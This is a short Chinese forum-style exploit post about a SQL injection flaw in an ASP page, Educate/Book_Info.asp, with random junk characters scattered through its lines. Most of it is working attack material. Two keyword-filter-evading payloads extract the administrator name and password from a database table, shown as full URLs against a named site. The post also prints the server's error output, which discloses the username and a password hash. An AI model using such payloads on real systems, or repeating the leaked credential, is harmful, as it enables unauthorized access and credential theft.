漏洞出现在Educate/Book_Info.asp1 ]7 P$ X* H8 O0 K8 S! {8 O
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
+ | Y% q$ h: V! D3 i$ w% Fexp:如下# N9 E# p7 z% {5 x7 Y8 d
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)" w0 H9 g% P( i2 ^9 Y) o, m
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 A; d# t- Q. G! T2 a0 Ehttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)' o& P5 I: {9 T
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'4 G! W X. S6 |, _1 q, {8 }
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
- e6 c5 X7 _/ x9 b6 _7 b1 @9 u/Educate/Book_Info.asp,行 88 N8 o3 [. w# e* L# Y1 W
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)- w) k8 }$ g4 ~# b: @' K, }- @
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ z. i Q8 h& N8 O将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
) s& Y: W7 E0 q1 ` p1 N6 x/Educate/Book_Info.asp,行 8 |